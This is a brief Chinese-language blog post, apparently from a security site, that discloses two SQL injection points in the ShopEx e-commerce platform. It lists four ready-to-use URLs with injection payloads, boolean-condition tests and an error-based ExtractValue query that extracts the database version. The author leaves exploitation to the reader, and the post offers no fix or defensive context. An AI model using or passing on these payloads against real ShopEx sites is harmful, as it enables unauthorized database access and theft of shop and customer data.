shopex两处通杀注入

分类:安全 | 2013-02-12 | 撸过 71 次
0人扯谈

一个是网站未开启伪静态的注入,一个是网站开启伪静态后的注入,以及是否屏蔽错误回显的2X2=4种情况。
如何注入就不多说了,自己捉摸!

https://www.webshell.cc/index.php?comment-822'/**/and/**/'1'='1-ask-commentlist.html
https://www.webshell.cc/comment-8967'/**/and/**/ExtractValue(0x64,concat(0x01,(select/**/@@version)))/**/order/**/by/**/'1-ask-commentlist.html
https://www.webshell.cc/index.php?comment-822'/**/and/**/'1'='1-ask-commentlist.html
https://www.webshell.cc/485/index.php?comment-190'/**/and/**/'1'='1-ask-commentlist.html
本站内容均为原创,转载请务必保留署名与链接!
shopex两处通杀注入:https://www.webshell.cc/4223.html

随机日志